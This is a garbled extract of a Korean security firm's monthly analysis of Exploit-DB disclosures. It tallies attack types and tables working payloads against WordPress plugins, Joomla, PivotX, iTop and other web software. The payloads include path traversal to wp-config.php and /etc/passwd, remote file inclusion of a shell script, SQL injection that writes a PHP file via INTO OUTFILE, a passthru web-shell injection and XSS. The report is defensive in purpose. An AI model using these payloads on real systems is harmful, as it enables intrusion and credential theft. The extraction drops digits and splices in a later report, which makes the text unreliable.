EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

Size: px

Start display at page:

Download "EDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C"

하니 서
6 years ago
Views:

1 EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 3 월에공개된 Exploit-DB 의분석결과, Local File Inclusion 공격에대한보고개수가가장많았습니다. Local File Inclusion 공격은주로 Directory Traversal 공격과함께이루어지는공격으로대파일이공격대서버에위치해있을때발생할수있습니다. Local File Inclusion 공격은파라미터값의경로를단순조작하는형태의쉬운공격입니다. 해당공격은시스템파일이유저에게노출되는피해를일으키기때문에난이도에비해위험도가매우높은입니다. Local File Inclusion 공격을예방하기위한가장좋은방법은소스코드를안전하게수정하는것입니다. 하지만사이트의규모가커서해당서버의모든입력값을검증하기어려운황이라면웹방화벽을도입하는것이현실적으로적절한방안입니다. 주요소프트웨어별발생현황을보면 Open Source CMS 로널리알려져있는 에서가장많은이보고되었습니다. 분석된 들은 자체의이라기보다주로신규 Plugin 들의이었습니다. 를사용하는관리자는사용인 Plguin 들의보안패치를실시하여서버가에노출되지않도록주의하여야합니다.. 별보고개수 보고개수 Code Injection File Upload SQL Injection 4 RFI 4 XSS 0 LFI 3 총합계 별보고개수 Code Injection File Upload SQL Injection RFI XSS LFI. 위험도별분류위험도 보고개수 백분율 6 8.8% 7 8.8% 합계 % 위험도별분류 공격난이도별현황공격난이도 보고개수 백분율 % % 하 7 8.8% 총합계 % 공격난이도별현황 하 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 0 PivotX itop Joomla Monstra 총합계 33 주요소프트웨어별발생현황 0 PivotX itop Joomla Monstra ** 5개이발생한주요소프트웨어별세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3953 File Upload 하 CP Polls Plugin admin.php XSS XSS 하 Best Web Soft Captcha Plugin <= admin.php XSS () XSS 하 WP Advanced Comment Plugin / XSS XSS 하 Best Web Soft Captcha Plugin <= admin.php XSS XSS 하 DZS Videogallery Plugin <= popup.php XSS XSS 하 DZS Videogallery Plugin <= ajax.php XSS LFI 하 Site Import Plugin.0. - page.php LFI RFI 하 Site Import Plugin.0. - page.php RFI LFI 하 Image Export Plugin..0 - download.php LFI LFI 하 Abtest Plugin - abtest_admin.php LFI LFI 하 ebook Download Plugin. - filedownload.php LFI LFI 하 Memphis Document Library Plugin / LFI LFI 하 Memphis Document Library Plugin /mdocs-posts/ LFI 3959 LFI 하 Dharma booking Plugin proccess.php LFI 3959 RFI 하 Dharma booking Plugin proccess.php RFI 3959 LFI 하 Brandfolder Plugin callback.php LFI 3959 RFI 하 Brandfolder Plugin callback.php RFI LFI 하 HB Audio Gallery Lite Plugin audio-download.php LFI 3963 LFI 하 Photocart Link Plugin.6 - decode.php LFI 396 LFI 하 Plugin IMDb Profile Widget pic.php LFI

2 EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 CP Polls Plugin admin.php XSS POST /wpadmin/admin.php?page=cp_polls&cal=&list=&i mport= HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f CP Polls Plugin dd009908f name="importfile"; filename="csv.csv" Content-Type: application/octet-stream <img src=x onerror=alert('you_are_owned!') dd009908f XSS 하 Best Web Soft Captcha Plugin <= admin.php XSS () /wpadmin/admin.php?page=captcha.php&action=whi telist&s=%3cscript%3ealert%8%9%3b%3c %Fscript%3E Best Web Soft Captcha Plugin <= XSS 하 POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f WP Advanced Comment Plugin / XSS 취약 dd009908f 점 name="comment[meta_value]" WP Advanced Comment Plugin 0.0 Hack <script>alert("hacked")</script> dd009908f name="comment[meta_key]" comment dd009908f XSS 하 Best Web Soft Captcha Plugin <= admin.php XSS POST /wpadmin/admin.php?page=captcha.php&action=whi telist HTTP/. Best Web Soft Captcha Plugin <= 4.. s=<script>alert();</script>&search IP=Click here to claim your prize! XSS 하 /wp-content/plugins/dzsvideogallery/admin/playlistseditor/popup.php?inite DZS Videogallery Plugin <= popup.php XSS 취 r=whatava864%7%3balert%8%9%f% 약점 f645 DZS Videogallery Plugin <= XSS 하 DZS Videogallery /wp-content/plugins/dzsvideogallery/ajax.php?height=&source=6d7f"><s Plugin <= ajax.php XSS cript>alert()<%fscript>894ba&type=&width= DZS Videogallery Plugin <= LFI 하 Site Import Plugin.0. - page.php LFI /wp-content/plugins/siteimport/admin/page.php?url=..\..\..\..\..\..\.. \..\..\..\..\..\..\..\..\..\windows\win.ini Site Import Plugin RFI 하 Site Import Plugin.0. - page.php RFI /wp-content/plugins/siteimport/admin/page.php?url=http%3a%f%floc alhost%fshell.php?shell=ls Site Import Plugin.0.

3 EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 SQL Injection..4 - item.query.php SQL Injection POST /source/item.query.php HTTP/... type=action_on_quick_icon&id=(select (CASE WHEN (644=644) THEN 644 ELSE 644*(SELECT 644 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action= SQL Injection..4 - view.query.php SQL Injection POST /source/view.query.php HTTP/... type=connections_logs&order=(select (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC POST /monstra-3.0.3/users/8/edit HTTP/ XSS 하 Monstra CMS /monstra /users/8/edit XSS csrf=685bba70d44b8b877937b56f5b87e669 35fe&user_id=8&login=user&firstname=%%3 E%3Cscript%3Ealert%8%9%3B%3C%Fscri pt%3e&lastname=%%3e%3cscript%3ealert %8%9%3B%3C%Fscript%3E& =% %3E%3Cscript%3Ealert%8%9%3B%3C%F script%3e&twitter=%%3e%3cscript%3ealert %8%9%3B%3C%Fscript%3E&skype=% %3E%3Cscript%3Ealert%8%9%3B%3C%F script%3e&about_me=%%3e%3cscript%3eal ert%8%9%3b%3c%fscript%3e&new_pass word=&edit_profile=save Monstra Monstra CMS RFI 하 LFI LFI.4. - admin-logs.php RFI PivotX.3. - index.php LFI PivotX.3. - ajaxhelper.php LFI /zp-core/adminlogs.php?action=download_log&page=logs&tab= %6%66%6f%6f%3d&filename=security&XSRFT oken=afd5bafed79d837486fdbeea8f87bc 9dea /pivotx_latest/pivotx/index.php?page=media&del=...//...//...//...//...//...//...//...//...//...//...//...// important/important.file&pivotxsession=ovyyn4ob jc5ym9 /pivotx_latest/pivotx/ajaxhelper.php?function=vie w&basedir=l3zhci93d3cvcglb3r4xxhdgvzdc9 CYXNlZGlyLwo=&file=../...//...//...//...//...//...//....//...//...//...//...//...//etc/passwd.4. PivotX PivotX.3. PivotX PivotX XSS 하 r58 - index.php XSS POST /my_files/index.php HTTP/. r58 search=%%3e%3cscript%3ealert%8%7xs S%7%9%3B%3C%Fscript%3E XSS 하 r58 - clients.php XSS POST /clients.php HTTP/. r58 search=%%3e%3cscript%3ealert%8%7xs S%7%9%3C%Fscript%3E

4 EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 Code Injection itop.. - config.php Code Injection POST /env-production/itopconfig/config.php?c%5bmenu%5d=configeditor HTTP/. operation=save&prev_config=&new_config=<? if(isset($_get['cmd'])) die(passthru($_get['cmd']));?> itop itop LFI 하 Image Export Plugin..0 - download.php LFI /wp-content/plugins/imageexport/download.php?file=../../../wp-config.php Image Export Plugin LFI 하 LFI 하 LFI 하 LFI 하 Abtest Plugin - abtest_admin.php LFI ebook Download Plugin. - filedownload.php LFI Memphis Document Library Plugin / LFI Memphis Document Library Plugin /mdocsposts/ LFI /wpcontent/plugins/abtest/abtest_admin.php?action=../../etc/passwd /wp-content/plugins/ebookdownload/filedownload.php?ebookdownloadurl=../../../wp-config.php /?mdocs-img-preview=../../../wp-config.php /mdocs-posts/?mdocs-img-preview=../../../wpconfig.php Abtest Plugin ebook Download Plugin. Memphis Document Library Plugin 3..5 Memphis Document Library Plugin LFI 하 Dharma booking Plugin proccess.php LFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?ga teway=../../../../../../etc/passwd%00 Dharma booking Plugin RFI 하 Dharma booking Plugin proccess.php RFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?ga teway= Dharma booking Plugin LFI 하 Brandfolder Plugin callback.php LFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abs path=../../../wp-config.php%00 Brandfolder Plugin RFI 하 Brandfolder Plugin callback.php RFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abs path= Brandfolder Plugin SQL Injection 하 Joomla Easy Youtube Gallery /index.php?option=com_easy_youtube_gallery&vie.0. - index.php SQL Injection 취 w=videos&mycategory=0%7%0or%0%7% 약점 7=%7%7&defaultvideo=9&Itemid=75 Joomla Joomla Easy Youtube Gallery LFI 하 HB Audio Gallery Lite Plugin audiodownload.php LFI /wp-content/plugins/hb-audio-gallerylite/gallery/audiodownload.php?file_path=../../../../wpconfig.php&file_size=0 HB Audio Gallery Lite Plugin LFI 하 Photocart Link Plugin.6 - decode.php LFI /wp-content/plugins/photocartlink/decode.php?id=li4vli4vli4vd3aty9uzmlnln BocA== Photocart Link Plugin LFI 하 XSS 하 Plugin IMDb Profile Widget pic.php LFI /user/test/home XSS /wp-content/plugins/imdbwidget/pic.php?url=../../../wp-config.php POST /user/test/home?p_p_id=79&p_p_lifecycle=&p_p _state=maximized&p_p_mode=view&_79_struts_a ction=%fenterprise_admin%fedit_user HTTP/. Plugin IMDb Profile Widget _79_jobTitle="><script>alert();</script>

5 EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 SQL Injection admin.php SQL Injection /admin.php?_g=products&cat_id=&sort[updated ]=DESC&char=T]%7%0UNION%0SELECT% 0,,3,4,5,6,7,8,9,'<? phpinfo();?>',,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4, 5,6,7,8%0INTO%0OUT FILE%0'/var/www/site/file.php'%0--% XSS 하 index.php XSS POST /index.php?_a=profile HTTP/ first_name=" onmouseover="javascript:alert(/immuniweb/);"

76 XSS 하 Huge-IT Slider admin.php XSS

76 XSS 하 Huge-IT Slider admin.php XSS 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.